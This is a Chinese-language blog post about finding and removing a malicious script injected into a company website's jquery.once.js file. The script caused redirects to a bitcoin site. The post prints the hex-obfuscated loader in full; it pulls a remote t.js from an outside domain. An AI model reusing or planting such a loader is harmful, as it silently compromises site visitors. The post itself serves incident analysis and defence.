官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
记一次WebShell查杀事件
遁地- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
记一次WebShell查杀事件
为了确保对外业务系统安全,我会经常浏览公司对外发布的业务系统、公司官网等,恰巧今天浏览官网发现了一处异常,在打开公司主页后,地址栏右侧提示一个窗口被拦截。当访问该拦截窗口后,弹出如下页面........,很不幸,中招了!!!!!
为了减少影响,汇报给领导后第一件事情就是关停网站。进行事件分析,分析步骤如下:
一、分析页面请求
使用谷歌浏览器直接通过IP地址访问官网,F12调出网络分析工具,查看网络请求过程,请求过程如下,从下图中可以看到是执行了一个JS,然后跳转到http://sendbitcoin.email/比特币的网站。
二、分析JS代码
找到恶意JS了,但是如何找到JS代码在哪里呢?这个问题困扰了我很长时间,官网已经没有运维很多年了,没人对官网的代码、发布目录等情况有所了解,只能要来系统账号自己来查找了,查了好久根本就无法找到t.js文件,经过分析后终于找到了突破口,通过查看JS的调用过程可知是由jquery.once.js调用完成的。
三、查找恶意代码
打开jquery.once.js,发现如下一段可疑代码,代码内容如下
var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);对这段16进制编码进行在线解码(https://tool.lu/),解码后内容如下图,总算是找到最邪恶的代码了。
这就是公司官网感染webshell的一次查杀,由于部署该服务的服务器发布在官网,且存在MS17-010漏洞,初步怀疑是利用该漏洞进行的恶意代码植入,但是由于所有日志均已丢失,已无法完成完整的溯源了.......
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 遁地 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
遁地 LV.1
这家伙太懒了,还未填写个人描述!
- 1 文章数
- 0 关注者
文章目录